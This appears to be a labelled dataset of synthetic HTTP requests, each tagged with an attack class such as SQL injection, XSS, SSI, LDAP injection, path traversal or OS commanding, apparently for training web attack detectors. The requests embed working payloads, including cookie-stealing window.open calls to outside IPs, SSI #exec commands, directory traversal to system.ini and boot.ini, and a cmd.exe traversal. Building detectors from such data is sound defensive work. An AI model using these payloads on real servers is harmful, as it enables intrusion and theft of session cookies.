Upgrade: rteaS/8.9, dl6i/1.1, Ipby/3.4, pfeM9r/9.1
X-Serial-Number: 881741666326313
----: ------------

null

End - Id: 48452
Start - Id: 42578
class: SqlInjection
GET /stsoten/qImmPV0oxp_dX/VuseatpiAemE/8ymtrn7ae4aet/xcug.sh?ts=%27%29+UNION+ALL+SELECT++++03663+FROM++++czr+++++WHERE+++++%28+++%27%27%3D+++%27&C2Jj2utwgetAFxF=dEYs8tl4.&dihPH=ef9iaat5s3e&etkcssrrTnsmd=3564&eneaT6hc=63861&etrR=teia1eitT&4os=8475583&ks5e=l%3Ao&I9AAUUf2=226590&auidxNrlnaStsn=261 HTTP/1.0
Host: www.rfpwt.org
Connection: cssf
Accept: video/quicktime;q=0.2, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: annoptws=uDra3r
Client-ip: 8.53.51.76
Cookie: rleeeegc=ehsamusr;TtnwErsa2=ilhthNie;rsock_streamsystemobjectOCv-btMo=s4 hr1lauitv
Cookie2: $Version="6"
Date: Fri, 20 Oct 06 16:17:30 GMT
ETag: W/"g5aldUCmL8IGCrX"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Mon, 01 Jan 07 20:59:12 UTC
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: *
If-None-Match: "hlq23lU3Oh7z.8.ZDu"
If-Range: Mon, 23 Aug 04 03:16:17 UTC
Max-Forwards: 2710
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: Basic SGRva2VoOmw4bzNqaQ==
Range: -327,463619-533,09-501926
Referer: /hih8p.htm
TE: chunked
Trailer: From
User-Agent: vMBKRf7Y9 http://www.powP.it
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: HTTP/0.3 www.5hrc.jpg, HTTP/9.8 130.173.125.146, 8.4 www.cwoefurv.tiff
Transfer-Encoding: Asgn
Upgrade: lxiev/4.8, Sc4/5.2, owd/0.5
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42578
Start - Id: 49743
class: XPathInjection
GET /nirnr9ai/etgbyeswx/yk2n78Teiete/nairGithoohozteebtws/5RgRQ0/nquwhejnm/veL9yF/snioelotu1cs0ldn9n/oehfem/DehoakmI6uarmm2i/sHWbig5kcf2gQOzC/tGSkzLnX5dE_Io09.css?gu9iwzn=%28i+++%3C+++++count%288i%2Fchild%3A%3Atext%28%29%29++and++++j++++%3C+++++count%28t0wmr%2Fchild%3A%3Acomment%28%29%29+and+k++%3C++count%28dk%2Fchild%3A%3A*%29++++%29 HTTP/1.0
Host: 245.74.106.20
Connection: close
Accept: application/zip, video/*;q=0.4, application/rtf;q=0.0
Accept-Charset: x-mac-ce, iso-8859-5;q=0.5, gb2312
Accept-Encoding: *
Accept-Language: tdeit-s, hr-is9
Cache-Control: rtmreeft='2s'
Client-ip: 24.134.122.55
Cookie: jPuu=v0o$s|ciy t;fom=hAncr;jbeR4ttAan=45977217
Cookie2: $Version="05"
Date: Thu, 02 Mar 06 01:24:01 GMT
ETag: "sMfN7FOz1rBZfHdD2"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 26 Feb 06 03:23:39 CET
If-Unmodified-Since: Mon, 17 Sep 07 19:33:54 CET
If-Match: "fkxUqCNikiz4VpiCvm"
If-None-Match: *
If-Range: "l8UmGJBfikP0i.2"
Max-Forwards: 76
MIME-Version: 0.1
Pragma: smoomr='tSisist'
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -1702
Referer: http://www.5dv3u.biz/ysdome/xIhzn8/yojacAiC.nsf
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: Mozilla/6.3 (X11; U; Linux i586 7.2; ms-nu; rv:1.1.7) Gecko/52225821
UA-CPU: x86
UA-Disp: 676,3592,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4005x8626
Via: 8.9 www.r1oO.html:9630, FTP/0.6 169.37.150.117:903, 0.9 www.dulcobw8.htm:446
Transfer-Encoding: identity
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49743
Start - Id: 48162
class: XSS
GET /hutssneocit/DHYoifC/ucidhsgle/2oepnucldqe2eaA/xplf0Maaq/JM3bfkfZ3T/vfPJ8%u_zlikeSU/6ldraiiy/X89nfEWAiframe7Z4dTM/deb9092Q/CTt1eef6oteTDo/C.kSmhUn98.nsf?du7quBUtddt=e9&gB94WVX=%3Cxml++++src+++%3D++++%22+javascript%3A+%5Balert++++%28%27imUdtRth%27%29%3B%5D%22+%3E&jJhQXtjoxl=d5telnet+sh+%5B6%40tuse%3Ayas&msnSptiairn=4sD&arfo1L3ckseO=o0km%29nue%3AldSdtWaftp&htlkwb6i=aEyAjyEf&ncNtat0zyS7l=fconnectuoptei%26iinull8%5D&lotmz5=853&ts7frw0=rFkFW&nqei=31&ersoznbmwarn=07KkZKuNY2v&d8p8datnnl=htu9ei+eer&seiNnhh4d=iatTrhe HTTP/1.1
Host: www.ene0.uk
Connection: keep-alive
Accept: application/*, video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 211.190.214.99
Cookie: toleteeo6dn9Ei4=dectgAgs;BUwXoaccess_logfEsystemO=?th em'$hud2;ooshgihh=t3t @Btvbscript;hooaiilnmvgjob4=50
Cookie2: $Version="37"
Date: Sat, 20 Aug 05 10:44:11 UTC
ETag: W/"KTjmOB4QF.aHd_v"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Wed, 20 Feb 08 03:17:34 CET
If-Unmodified-Since: Mon, 05 Feb 07 10:14:09 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 304
MIME-Version: 7.0
Pragma: pmenv=t
Authorization: NTLM aVBwbGFsYWlyZG9kcmVzRWZwZWVpZElodGRldGlhc3d1bjg1
Range: 248-
Referer: /xCoaHnsn/tny5r/ihtjCEFa/vso8w/N2nrg.wmn
TE: gzip,gzip;q=0.9
Trailer: If-Modified-Since
User-Agent: Mozilla/3.6 (compatible; eboel; Linux i386; 6ocuisjrs)
UA-CPU: MIPS
UA-Disp: 472,3569,8
UA-OS: Win98
UA-Color: color16
Via: FTP/2.9 www.7zpeT.jpg
Transfer-Encoding: grg3ro
Warning: 469 www.eeshc.gif:6 "8tbhssqusptoj" 
X-Forwarded-For: 129.132.255.71
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48162
Start - Id: 40754
class: SSI
POST /kGlckK3Vor-SZ2B/58iinf5isrElT4jfati/wsdAl6L@qk.htm? HTTP/1.1
Content-Length: 271
Content-Language: nb,snui
Content-Encoding: compress
Content-Location: http://atdblenp.com/zehiee/q7yiihdS/naoru.mpg
Content-MD5: aW95YW5oaHNlUnNkaTFhTg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jul 09 21:48:58 GMT
Host: www.doiaheiu.net
Connection: keep-alive
Accept: application/*;q=0.4
Accept-Charset: iso-2022-kr, shift_jis;q=0.7
Accept-Encoding: identity;q=0.3
Accept-Language: itHans-n9tkhnm;q=0.6, ce6u9ep-7s3eo7ll, es-iaheugpS;q=0.5
Cache-Control: no-cache
Client-ip: 57.138.29.237
Cookie: mgRf=ghewsrzdinihp2soc;Q886b=i
Date: Sun, 26 Apr 09 10:32:10 GMT
ETag: W/"StD9lTanH-1yt1o"
Expect: eNay=ejiiueus;5h5utnem
From: nsnsb@neop.it
If-Modified-Since: Wed, 18 May 05 21:34:40 CET
If-Unmodified-Since: Tue, 02 Mar 10 03:09:01 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 28 Jul 05 19:01:12 GMT
Max-Forwards: 239
MIME-Version: 8.0
Pragma: 2f=sirrs
Authorization: Basic bmZuamhzOmlFSXMzeg==
Range: 30-86033,50297-483952,510771-833674
Referer: /9odyn/dauoeuhp.txt
TE: trailers,gzip,trailers
User-Agent: i5NObch http://www.teebrn.uk
UA-CPU: MIPS
UA-Disp: 442,6070,32
UA-Color: color16
Via: srrnkd/9.2 24.42.48.59, 5.4 www.swew.png
Transfer-Encoding: gzip
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ----------------------------------------------

obinaaaogn9hi=<!--    #odbc     connect="yeAha,niuocd,nVmm"     statement="select   *     from   tx"-->&aa7ssaekdi=4Xe&essle=33&ang9tlAirvtdd=hrbinrrlr&buWYleihswuu=aJFJO&oiSan=nw9qOh60&nhou=itesonnr6&.bftpdlike4in.rW-=seoob&drmbm=iI3&oOegi=entrrS

End - Id: 40754
Start - Id: 40091
class: SSI
GET /rDr/diesOitceah.cgi?tf6Agwvb-U=naS&d9ypDp=60&sHtn=n%5Cdj+passwdrimqcf%3C7zore&RlG-2GMN=%5C%5Bhtnd%7C5naatftp&tl5oAsetGrrcsi=8&uRheo=htpass9e+e4fHnsD2rcpgotI-%7E&rzqvaaihslof=anbmywethiew&azicuurgAc=8623&4rsnanoae=%3C%21+%23%3C%21--++++%23exec+++cmd%3D%22id%22--%3E&617olDFuexecwp-C=i7XwJ&20cgn4o=0556&A79psee9mess=805&Y_9-k0Tj=gde3&0AHO_m=laehngoodmmochadtdj HTTP/1.0
Host: 197.134.21.113
Connection: close
Accept: text/html
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 139.170.207.9
Cookie: iitohdixt=netcatphpjs sodt(rgiH?i;oeyetrlJmyog=rD;sEus4=rmd6uyneeeujo;tsadr=o6;jk4vjot0r=8
Cookie2: $Version="738"
Date: Tue, 02 Jun 09 10:19:55 GMT
ETag: W/"_Xa4edX9KDjWHxZa1Le"
Expect: tslD=cua4;iiit=tpIAwosc
From: eolu8j@aioa.fr
If-Modified-Since: Mon, 10 Oct 05 20:44:53 GMT
If-Unmodified-Since: Fri, 29 Jan 10 11:10:10 CET
If-Match: *
If-None-Match: "fk8cu4sMfGdoBgsFDG"
If-Range: Wed, 17 Sep 08 10:43:19 UTC
Max-Forwards: 2
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: eke5at o9mi=ikHts9eh
Range: 1646-745
Referer: /olaaer/nyefmgP/ui4w/sawnUhef/eDnjarwa.asp
TE: deflate;q=0.8,chunked;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (compatible; sktEgsatee; Open BSD i586; faiiF)
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0944x596
Via: HTTP/9.4 232.225.23.220, 4.5 156.113.93.118:2288, 6.6 www.gutnrU.tiff:0
Transfer-Encoding: identity
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40091
Start - Id: 48259
class: XSS
POST /iirMka/oDttaUtemuheid/sopgoan/nJGzgxqyIKlOzUR4VzSS/Ciisc6hrlwee/see/gw4F4X@zwa_57H/enHS1B/besnhIgraD4/eHISD_AJ.GM8iNLBN/azthmaex/hktnsiejAOa.js? HTTP/1.0
Content-Length: 79
Content-Language: qcn1helu,iytts
Content-Encoding: identity
Content-Location: /Caig.gif
Content-MD5: ZGFlaXRvZWY2QW9uY3J5Ng==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jun 07 08:20:06 GMT
Last-Modified: Wed, 26 May 04 09:45:30 UTC
Host: 99.222.53.252
Connection: close
Accept: application/rtf, video/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 194.108.155.40
Cookie: 3L5UEIpositionpe=<meta   http-equiv = "     refresh  "    content   =   "   0;url=javascript:[window.open('http://183.207.40.190/on.mspx'+document.cookie);] ">;ce=e&iunl
Cookie2: $Version="0"
Date: Sat, 30 Apr 05 18:10:30 CET
ETag: "t1wgj5x.CnsXw7Kg."
Expect: eciai=r9uee
From: astmd@urn3eltYo.fr
If-Modified-Since: Mon, 28 Jun 04 04:03:07 CET
If-Unmodified-Since: Wed, 15 Mar 06 11:18:00 GMT
If-Match: *
If-None-Match: "yyoCj0Tc4Nxf2fp.dcoZ"
If-Range: Sun, 10 Apr 05 18:20:26 GMT
Max-Forwards: 0
Pragma: 2s=ttiw
Proxy-Authorization: NTLM em1mb2hDUnJlWmU3Z2FzaWtjcHRUbzJ0NXVzem9iaXM=
Authorization: Basic bDVjbGtsOnNpVGhlc1Jt
Range: 213803-57,-7
Referer: /erDph1rq/ocmhay/ratiim/i9etd/eu5tr.conf
TE: gzip,gzip;q=0.2
Trailer: If-Match
User-Agent: rNtedYnfase2
UA-CPU: Sparc
UA-Pixels: 9755x524
Via: 8.8 www.q77bs.jpg, FTP/8.5 205.229.231.40, 6.2 74.123.239.118
X-Serial-Number: 64409334
----: ---------------------------------------------

aeiiae=stieO&insrlytaei=gtoi$r&e92aed=55erErfn9ftem&7awsoldvwiU8h=9ioN6bm2atI

End - Id: 48259
Start - Id: 45911
class: PathTransversal
GET /i8ss6DeAhTtgfee9/o8orkg/t2Us1u-g6H1qnxW/nE8IB_DBU0H_b-sW/gty7dgss/iymhblzktfvIAEyoer/owcaOdszunDoh/UX/J07P1CRhRewD.dll?ipr=mnN&adnms=obee&seufeseino=o5PwaRbJuN.&elfu=28684&Itlxieooe22d=%29emo%3C%28Bh%3C&alsesfvo=711&aSTed=6133579&sac9dac5trDb=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&ah=79832443 HTTP/1.1
Host: www.tljfg.fr
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: hz-gb-2312;q=0.3, x-mac-japanese;q=0.5, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: Gel=9l
Client-ip: 81.146.184.214
Cookie: hacsar8qmpmtt=or<uT$mphp6j+li&tma;sqs=03234472;aAn4t5c5tr=shdno
Cookie2: $Version="230"
Date: Fri, 26 Nov 04 03:05:08 UTC
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Wed, 21 Feb 07 07:03:11 GMT
If-Unmodified-Since: Tue, 13 Mar 07 16:06:10 CET
If-Match: *
If-None-Match: *
If-Range: "gyrQkZ1VE0FDQxsvxn6"
Max-Forwards: 4
MIME-Version: 1.5
Pragma: wnie='tiat'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest realm
Range: -106180,0973-,3598-
Referer: /3ninc/40bIsb/Ufitt/Rl0e/oiEitnud.js
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.0 (Windows; U; Win98 9.1; ei-og; rv:0.4.5) Gecko/16127175
UA-CPU: PowerPC
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4595x1071
Via: 0.7 175.113.250.250, 2.3 www.qrHneloM.shtml
Transfer-Encoding: compress
Upgrade: fes/4.2, eismN/3.9
Warning: 042 www.os8qi.css "tlxuhcset" "Thu, 03 Dec 09 03:33:47 UTC"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 9152638367
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45911
Start - Id: 44731
class: PathTransversal
GET /8solspknoNee8oqam/kibrqFp85t0sznw/Tortdinrlnhhg/ea/ajwpBAXAtE7ubrEvMvd/tlmdybbXrtsuphrm/Dy@fr1location8kaTVW/GXZAunioncxQ5Lzf/aSdropQHi_f_8YP/n6iSRA5sihUoTlrlt/exjvQIiF.gif?OoydLBWwp-5=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&ifo3eO1ua7omlym=r&nped=hnuv&jnt=ldenp&dertsgcriomia=752090163&yatr2mssen=locatione%24&Cshuxor=+s%25ao%40OdHousr%2Ftoptboot.ini&o8lBhto6Lne=%25usystem&nidhiadro=3766231&eErMteqea8ks=hi&lha=5677625&ph3ysAe5iWeoee=6602017&mnk15ie6zr=it HTTP/1.1
Host: www.muilvEasd.uk
Connection: keep-alive
Accept: audio/basic;q=0.8, image/gif;q=0.2
Accept-Charset: iso-8859-3;q=0.0, x-mac-turkish, x-mac-icelandic;q=0.0, isiri-3342;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0
Cookie: to0AJ8frUrtdnl=iBKqWEDqy.0v
Cookie2: $Version="76"
Date: Sun, 17 Sep 06 11:27:51 UTC
ETag: "cagFw8bM.KdYd@fBxbEm"
Expect: 100-continue
From: gi6k@oggsey.org
If-Modified-Since: Sat, 29 Dec 07 01:09:44 GMT
If-Match: "dw6r1VT32G0ZvrM4-3Ak"
If-None-Match: "uIDPXOZjfn5LWHT"
If-Range: Sun, 09 May 04 05:26:54 CET
Pragma: i01l8eet='ura1sa'
Authorization: agoxte eiinhrh=oipd
Range: 218-,38304-
Referer: /Nwhlg/oLsIna3/lahs/deTe8b.zip
Trailer: TE
User-Agent: Mozilla/3.4 (Windows; U; Windows NT 5.5; en-Yi; rv:7.6.2) Gecko/77652523
UA-CPU: MIPS
Via: 9.2 14.250.46.83, HTTP/4.4 188.252.146.252, HTTP/0.1 www.jeouARq.png:0
Transfer-Encoding: identity
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
----: --------------

null

End - Id: 44731
Start - Id: 38408
class: LdapInjection
GET /ti3abrm/s3lP05oF/4mfawa8nSne/NedestsSaxccdeose/inputMHs/R1yu/tYs/uNnIV9/iTtfgttloo4e/IeeIoes6utYrt.jpeg?abuonrtu=h+rr%2BM6hptugyrnodeddI&utwased9zdtapni=arexecjAetmp&qtrseQ=NE+0degscriptw&daTohpiahtkE=319&eBsuAAss9eeos=sflRfx9J&U9ubodyKabFO=5847831&@uxUWl8Nd=tJctAtnHmX&yaoNodml2S7etg=ttm&JwY_=55&HheneE4rmevrlmZ=le&rh=sasi8SsorB&6ndnmaedeiax=%29+++%28+++%7C+++%28displayName%3Dhad*%29+%28name%3D+had*++%29%28++++mail%3Dhad*++++%29&x1dzobdmecw=uJZD7&Oepb0oP=1&mn9ein=0229 HTTP/1.1
Host: www.atimol.de
Connection: retiw
Accept: */*
Accept-Charset: windows-874;q=0.3
Accept-Encoding: deflate, identity, identity;q=0.3, deflate
Accept-Language: *
Cache-Control: ntuq=e4ycats
Client-ip: 167.68.68.243
Cookie: tcfeis47d=noeiG;9eto0=Renbc9;rrmOcedkautD8=me9awls;gMobject5oXR0HR=Oro;autEtaHtynnM2oe=edFz9ahndnem5h;B0wh2kscywttdc=eeb
Cookie2: $Version="47"
Date: Thu, 03 Jan 08 03:37:56 GMT
ETag: "G4D6p25u0LPhzxVbK"
Expect: c2dEa
From: uftet9d@Engnam.uk
If-Modified-Since: Sun, 01 Feb 09 16:32:11 UTC
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Sep 04 18:54:04 UTC
Max-Forwards: 617
MIME-Version: 0.1
Pragma: r0E=uwl
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: NTLM ZWhjOXhiaWlzZ3djbmFlbElBZXJ4ZUdvOUVkZXN4ZWllMnd0dG5uemVibHV3Yw==
Range: -96373
Referer: http://www.ewded.fr/pA9nasnh.dll
TE: gzip;q=0.0,deflate;q=0.5
Trailer: Max-Forwards
User-Agent: etaigaeeiiFecetau
UA-CPU: MIPS
UA-Disp: 2631,041,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7262x7113
Via: 2.3 www.nnm7tk.jpg:51, HTTP/2.6 51.101.238.227, FTP/6.3 156.249.199.208:5
Transfer-Encoding: gzip
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38408
Start - Id: 47266
class: XSS
GET /eeFe1heeo8rf/3jdrit/a4IrGsa4SLLB/3A6t1tF1Jn0P/5nxisiun8t4so/er.jpg?hye4eer=6&rDsmesrcne=%24uitmanme%3F7evqlsystem&IwwbD7FW=aliy&Ohavwhoe1ssSc=isl+&nsose=dfta-&etlnaiepc4=luw&tdyoet9=rr7%26eca+e&p1ontaglrb=trhrostOIyjsm&usertneuotoe=23&HGLYj=nea&sisn3rnrieaj=oimuOyd+8%7EeaZd&ureutfdrskOOigi=f&A9tzqlt8bk=nPFXyFwp&stg5isH=%3Ca++href++++%3D%22javas%26%2399%3Bript%26%2335%3B%5Bwindow.open%28%27http%3A%2F%2F202.45.66.146%2Fnierla.php4%27%2Bdocument.cookie%29%3B%5D++++%22%3E HTTP/1.0
Host: 59.170.112.242
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: utf-7;q=0.6
Accept-Encoding: 
Accept-Language: 5egIEw2B-esotaRmt, q5mf-ssRrzo;q=0.6, cd-is;q=0.6, 2aa-mcnwnr, lcLsmi-rl7In;q=0.5
Cache-Control: max-stale=2
Client-ip: 10.37.184.28
Cookie: rI=:hediryOtue:;phy=eb20ebrlecme;95aontwk=sallediao2lcort;reu=nEft6i5;ncargntu=0670721;uLFx6S6BX=mtn
Cookie2: $Version="4"
Date: Sat, 23 Oct 04 10:37:41 UTC
ETag: W/"23jIscF3AhyqY.WJB"
Expect: ntthjebs
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Tue, 23 Nov 04 08:04:20 GMT
If-Match: *
If-None-Match: "l3Hl775Y3-0BG2s"
If-Range: "cK.IXQxI2yMdAH-"
Max-Forwards: 75
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic c0lkZHRkNTpucmZH
Authorization: Digest realm
Range: -1,528-520677
Referer: /enl0/mcxdn/iyoOlOb.exe
TE: gzip,chunked;q=0.8
Trailer: Warning
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 7.3; el-Ta; rv:1.1.6) Gecko/12967178
UA-CPU: Sparc
UA-Disp: 5931,8389,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 753x7661
Via: 4.5 241.48.49.251, dryox/2.8 www.adbt.shtml:3, hrw/9.8 81.77.9.175
Transfer-Encoding: acsne
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 816 www.tnnynhia.jpg:19076 "wwNrihTcIteeag" "Sat, 20 Oct 07 01:41:20 GMT"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47266
Start - Id: 44481
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 242.207.94.67:80
Connection: rrioist8
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.6
Cache-Control: oha3nne=Inxijc
Client-ip: 95.194.5.171
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="960"
Date: Mon, 13 Jun 05 11:36:18 CET
ETag: W/"tWaGECFfpG_GilO7"
Expect: nets=rpaui;afeisve8=e88t
From: xeaiisnn@jemn.de
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Tue, 07 Oct 08 21:39:33 GMT
If-Match: "mCRsXZaQTbu9HpHL"
If-None-Match: "k6l2PoLg45XvUvT"
If-Range: Thu, 05 Jan 06 06:45:25 UTC
Max-Forwards: 7
MIME-Version: 9.7
Pragma: e='etee'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest qop=auth-int
Range: 31467-04,46-
Referer: http://www.afetn.biz/bmftbxo/oosls/tapP5i/uHoyi.avi
TE: gzip,trailers
Trailer: Trailer
User-Agent: lsuemcmuaNyawdploA
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4559x569
Via: lni/4.6 www.m4upn.gif, 5.8 www.iOREoH.jpg
Transfer-Encoding: deflate
Upgrade: egh/8.1, tns/7.8, oeTt/4.0, i6k/7.5, srt/5.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44481
Start - Id: 39207
class: SSI
PUT /tgETxH0MU8TqFqs._wt2/63fM0g/64fK13TeO@GU.mspx? HTTP/1.1
Content-Length: 265
Content-Language: Q5l9bmem
Content-Encoding: deflate
Content-Location: http://www.ddnEtn.ch/eammds/Rtayfy2t.shtml
Content-MD5: bmlkbGFkaGRubjRlbmVFbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Oct 07 04:08:23 UTC
Last-Modified: Sun, 31 Dec 06 07:04:36 CET
Host: 183.214.178.40
Connection: keep-alive
Accept: audio/*;q=0.8, text/xml;q=0.7
Accept-Charset: iso-8859-5;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 185.235.27.5
Cookie: at8UeamI=n%;tHrEdtofmnhsxnh=as;mdeunlts=8011793;Dj2Tt=9600849
Cookie2: $Version="690"
Date: Thu, 15 Jan 04 24:40:39 CET
ETag: W/"tkG_MPg8BOWUxnTI"
Expect: 100-continue
From: egngmnl@let9lo.net
If-Modified-Since: Sat, 05 Nov 05 01:52:11 UTC
If-Unmodified-Since: Tue, 01 Nov 05 05:45:05 GMT
If-Match: *
If-None-Match: "QYFZRF-xgWZDOtP2tc"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: NTLM bWVsd3VpZHNzaGxlVHN6YXZybXRFYWl0ZW9PZThhZTZhdHNpMGQ2ZWh6dHlzZWw=
Range: -6444
Referer: http://Iirs.ch/41ib/utieit/trea/uorA.fgf
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: qndy2 (oEl8A@weix; aEwxtm; i@XfPnfI3A; ahC3wZZ6OV)
UA-Disp: 375,7789,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 466x9263
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: nsek
Upgrade: mwT/9.9, pqe7ei/0.1, ilshda/6.7, sDi/9.1, esice/0.8
Warning: 080 161.106.107.38 "ptynoda1w" "Wed, 05 Oct 05 18:34:52 GMT"
X-Forwarded-For: 10.24.21.76
X-Serial-Number: 4765226560917916
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

u2a=l'se&xonth=<!--#echo var="date_gmt"-->&iezmcgullbitbta=djBguChjX&tNeO1nntrb9l=80nuorH3yarla0l&eyesiho8=ritd4ct&rbubaka=tnrrhvh&sd6=iettezbe+s&bduevthAd=oes6&IUcrAQtONv=273320&C1oKsYJAVPTR=naNmvNfXpcsU&-L@UmFl-jT=sfwynetcat&Xnoen8tde11wm=UoMnlg

End - Id: 39207
Start - Id: 46550
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: www.n5do2bh.uk
Connection: close
Accept: audio/x-wav;q=0.5, image/*, video/mpeg
Accept-Charset: x-mac-greek, iso-10646-ucs-2
Accept-Encoding: gzip;q=0.7, identity;q=0.7, compress;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 249.247.50.249
Cookie: lsdBHIvY49n.=7Z.H;Ux1evalT8=u/;Ise=0c7;rot=+h6;anela=ostyle/ suinsert6execenbat;ew=e@aL\ts80d4dii0e
Cookie2: $Version="88"
Date: Tue, 30 Jun 09 23:36:50 GMT
ETag: W/"9D841MOe5gpWEsHJk"
Expect: atpSh=pnachAn
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 02 Sep 07 10:24:22 GMT
If-Unmodified-Since: Sun, 08 Jun 08 23:39:43 GMT
If-Match: "xIRzK16jp7t-YVqterIT"
If-None-Match: *
If-Range: Sat, 16 Jul 05 05:59:22 CET
Max-Forwards: 7049
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic eW50c2k6ZXBsYWFl
Range: 2794-2,-4107
Referer: /1aao/edxmm/9ayo/seauatb/frfcxt9a.js
TE: trailers,trailers
Trailer: Pragma
User-Agent: t6ee/7.5.8
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color8
